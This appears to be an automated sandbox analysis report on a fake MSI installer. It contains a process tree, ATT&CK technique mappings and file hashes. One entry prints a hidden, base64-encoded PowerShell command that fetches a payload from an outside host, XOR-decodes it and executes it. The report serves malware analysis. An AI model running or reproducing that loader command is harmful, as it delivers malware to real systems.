  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
  2⤵
  PID:784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:1
  2⤵
  PID:3996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6788 /prefetch:1
  2⤵
  PID:3876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6844 /prefetch:1
  2⤵
  PID:4872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2276 /prefetch:1
  2⤵
  PID:6032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6892 /prefetch:1
  2⤵
  PID:5548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6232 /prefetch:8
  2⤵
  PID:4456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5284 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1768
- C:\Users\Admin\Downloads\processhacker-2.39-setup.exe
  "C:\Users\Admin\Downloads\processhacker-2.39-setup.exe"
  2⤵
  - Executes dropped EXE
  PID:2692
- - C:\Users\Admin\AppData\Local\Temp\is-7LI5M.tmp\processhacker-2.39-setup.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-7LI5M.tmp\processhacker-2.39-setup.tmp" /SL5="$C01D0,1874675,150016,C:\Users\Admin\Downloads\processhacker-2.39-setup.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID:6080
  - - C:\Program Files\Process Hacker 2\ProcessHacker.exe
      "C:\Program Files\Process Hacker 2\ProcessHacker.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Enumerates connected drives
      Checks system information in the registry
      Checks SCSI registry key(s)
      Checks processor information in registry
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SendNotifyMessage
      PID:5224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2184 /prefetch:1
  2⤵
  PID:2284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1736 /prefetch:1
  2⤵
  PID:1668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,15549972148134752159,1547320644412750452,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7352 /prefetch:2
  2⤵
  PID:4452

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3244

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3348

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:544

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_x64__installer___x32__.zip\password.jpg" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2428

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
1⤵
- Drops file in System32 directory
PID:5164

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2024

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
1⤵
PID:4520

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\x64__installer___x32__\password.jpg" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3436

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5728

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\x64__installer___x32__\password.jpg" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5908

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:2308

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\x64__installer___x32__\password.jpg" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4432

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:2804

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\x64__installer___x32__\password.jpg" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3036

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4908

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\x64__installer___x32__\password.jpg" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4324

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2692
- C:\Windows\system32\dashost.exe
  dashost.exe {aba23746-3db7-4b2d-88875e0013c3a409}
  2⤵
  PID:1944

C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\Temp4___x64___setup___x32__.zip\setup.msi"
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:2784

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1220
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 4657F701D8B8E202F2B875BAF772D7D8
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:5536
- C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe
  "C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe" x -p2161183588a "C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\nijboq.rar" "C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\"
  2⤵
  - Executes dropped EXE
  PID:4348
- C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe
  "C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  PID:2108
- - C:\Windows\SysWOW64\explorer.exe
    C:\Windows\SysWOW64\explorer.exe explorer.exe
    3⤵
    - Loads dropped DLL
    - Checks processor information in registry
    PID:1088
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AdAB3AG8ALQByAG8AbwB0AC4AYwBvAG0ALwAwADIAMAA3ADQALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      PID:2524
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
        5⤵
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:4100
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93d6e46f8,0x7ff93d6e4708,0x7ff93d6e4718
        6⤵
        
        PID:6024
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,11700687400493000722,15632878735106768234,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
        6⤵
        
        PID:3692
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,11700687400493000722,15632878735106768234,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3
        6⤵
        
        PID:5840
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,11700687400493000722,15632878735106768234,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:8
        6⤵
        
        PID:2004
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11700687400493000722,15632878735106768234,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
        6⤵
        
        PID:4724
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11700687400493000722,15632878735106768234,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1
        6⤵
        
        PID:1128
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11700687400493000722,15632878735106768234,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4216 /prefetch:1
        6⤵
        
        PID:5664
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11700687400493000722,15632878735106768234,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2360 /prefetch:1
        6⤵
        
        PID:5972
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11700687400493000722,15632878735106768234,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4388 /prefetch:1
        6⤵
        
        PID:2596
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,11700687400493000722,15632878735106768234,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 /prefetch:8
        6⤵
        
        PID:2924
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,11700687400493000722,15632878735106768234,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 /prefetch:8
        6⤵
        
        PID:4420
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\FCGIJDBAFC.exe"
      4⤵
      PID:4000
    - - C:\Users\Admin\AppData\Local\Temp\FCGIJDBAFC.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FCGIJDBAFC.exe"
        5⤵
        Executes dropped EXE
        
        PID:3260
      - \??\c:\temp2\Autoit3.exe
        
        "c:\temp2\Autoit3.exe" c:\temp2\script.a3x
        6⤵
        Executes dropped EXE
        Command and Scripting Interpreter: AutoIT
        Checks processor information in registry
        
        PID:4284
        
        \??\c:\windows\SysWOW64\cmd.exe
        
        "c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\ebacgbg\ehecfba
        7⤵
        
        PID:4544
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic ComputerSystem get domain
        8⤵
        
        PID:5976
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding FD1EE6BAC78ED65F9F91DB13D6369993
  2⤵
  - Loads dropped DLL
  PID:2704
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 25D2C41FC69E01AF9E9687FED3E8AB41
  2⤵
  - Loads dropped DLL
  PID:4072
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 107BF85A04AF9CFC5C101EE230B988BB
  2⤵
  - Loads dropped DLL
  PID:4620
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 7078B8DBC10D9795F368A1A3A624ACCC
  2⤵
  - Loads dropped DLL
  PID:5868
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 6AE03389D34D055AA57060489A1174E8
  2⤵
  - Loads dropped DLL
  PID:1784

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1392

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3684

C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\Temp4___x64___setup___x32__.zip\setup.msi"
1⤵
- Enumerates connected drives
PID:464

C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\Temp4___x64___setup___x32__.zip\setup.msi"
1⤵
- Enumerates connected drives
PID:4900

C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\Temp4___x64___setup___x32__.zip\setup.msi"
1⤵
- Enumerates connected drives
PID:4884

C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\Temp4___x64___setup___x32__.zip\setup.msi"
1⤵
- Enumerates connected drives
PID:4280

C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\Temp4___x64___setup___x32__.zip\setup.msi"
1⤵
- Enumerates connected drives
PID:5016

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
PID:5368

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault5c0d1b0dh8f92h4007hadcehc1b84725989c
1⤵
PID:1912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff93d6e46f8,0x7ff93d6e4708,0x7ff93d6e4718
  2⤵
  PID:2400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,9449036042557865397,5384148309015969643,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
  2⤵
  PID:4888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2220,9449036042557865397,5384148309015969643,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
  2⤵
  PID:1904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2220,9449036042557865397,5384148309015969643,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8
  2⤵
  PID:2660

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

AutoHotKey & AutoIT

T1059.010

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e5b9c8e.rbs

Filesize
25KB

MD5
ee2df94450ef8a396e597b120c74af02

SHA1
294cfa4a784b0cafd17e32d9992323f87c0d8937

SHA256
ed9f83c39d860047122c80950ce10474a8eefec0b77632b64f7eac38c07bbd00

SHA512
780c50afcd65f208c3a165d206053790be15720473f467da3a30bd53c79076baeb06910e918e8251fd5a2ed6bf2b67b16931e41560d5882a5b82a35de44b7a26

Download Submit
C:\Config.Msi\e5b9c92.rbs

Filesize
3KB

MD5
c7d1609f495d1ac027c0b884002bebce

SHA1
35ab61afaa13d7ee910270c1e65cdd0620aeb6cf

SHA256
0b397a3a7763c187cbaba08284912821f36d20f87b0250220b2c1a8f010fae1e

SHA512
2e1d33a25c374b73337d27565790040c67409ce5cf39058a35c2c9d461cc2bcf0597d358f447d6a7529a8c17e283224601305eaec5c5425e9ec32c2ee9f8b1ab

Download Submit
C:\Config.Msi\e5b9c95.rbs

Filesize
3KB

MD5
c84a2fa05fc90e128228f0a58a208ac8

SHA1
d90e9216d4b26a45bbf91b7413eb8fe44e4548f5

SHA256
da3f5d586c2ef8e0888d4b0217843e00ba57cdf010e1be108e32b9104ecc28e5

SHA512
a002b7a2377f4592fd03ca0ebe78f96c98742febc4292cced60d5440d83a831e54e437f6e37cfe0745c39d3bd52677587a83117ad48d52b6dd05be228cee5af1

Download Submit
C:\Config.Msi\e5b9c9a.rbs

Filesize
3KB

MD5
53747c0e522f7a1d4b7077a0ce0b60b0

SHA1
6bc759efde742ed64cdea5764f192e0456cd9857

SHA256
9a57b64a696bd6377bf0ffc7491ef3a9f77fa9ec981c0d98ab5c042ad294b678

SHA512
4f290b0056dda5ac5c9a7cf930ad80cab89a6319f0628f764e025a9313a1d8b677bc75927d0bc70463adaa4409c960f5b53b455cefc35fd3fef83567cbb22dfb

Download Submit
C:\Config.Msi\e5b9c9d.rbs

Filesize
3KB

MD5
f32041927b723cb592092e973a27f110

SHA1
3367a29428cd0404012ff1d0c42958e1eb055ec1

SHA256
c55dc03b996580b12f74e5b42fa95a17f746321242a53c7882211bf290aa8b3c

SHA512
43a72f4849a095f82d4baf40790fcbfb7020711b39337a31781a7b150a57776b18d252f6241774a7a160dc2f1f9bad1ec38957466cc13fdbd779620c7c453c53

Download Submit
C:\Program Files\Process Hacker 2\ProcessHacker.exe

Filesize
1.6MB

MD5
b365af317ae730a67c936f21432b9c71

SHA1
a0bdfac3ce1880b32ff9b696458327ce352e3b1d

SHA256
bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4

SHA512
cc3359e16c6fe905a9e176a87acf4c4ed5e22c29bfca11949799caf8442e00ec0d1679b3d8754dbc3e313528d3e8e82c0ec1941e2c3530b48229c1cb337f6b8b

Download Submit
C:\Program Files\Process Hacker 2\ProcessHacker.sig

Filesize
64B

MD5
2ccb4420d40893846e1f88a2e82834da

SHA1
ef29efec7e3e0616948f9fe1fd016e43b6c971de

SHA256
519c2c2ca0caf00db5b3eb2b79dfe42e6128161c13aeb4b4d8b86fbffc67e3d4

SHA512
b2a000b33d4a9b2e886208fc78aeb3a986f7bd379fb6910da9f6577603aa6e8237cb552eabca70445f37b427419beeff0b061090cb952331b8db322ce2e58bc6

Download Submit
C:\Program Files\Process Hacker 2\plugins\DotNetTools.dll

Filesize
132KB

MD5
b16ce8ba8e7f0ee83ec1d49f2d0af0a7

SHA1
cdf17a7beb537853fae6214d028754ce98e2e860

SHA256
b4cc0280e2caa0335361172cb7d673f745defc78299ded808426ffbc2458e4d9

SHA512
32de59c95d1690f4221b236376e282c8be1bb7f5d567592b935dcd798b36b80e86da81741c5845fa280386f75f6eafc9bbd41035362984150b134d24aede61eb

Download Submit
C:\Program Files\Process Hacker 2\plugins\ExtendedNotifications.dll

Filesize
140KB

MD5
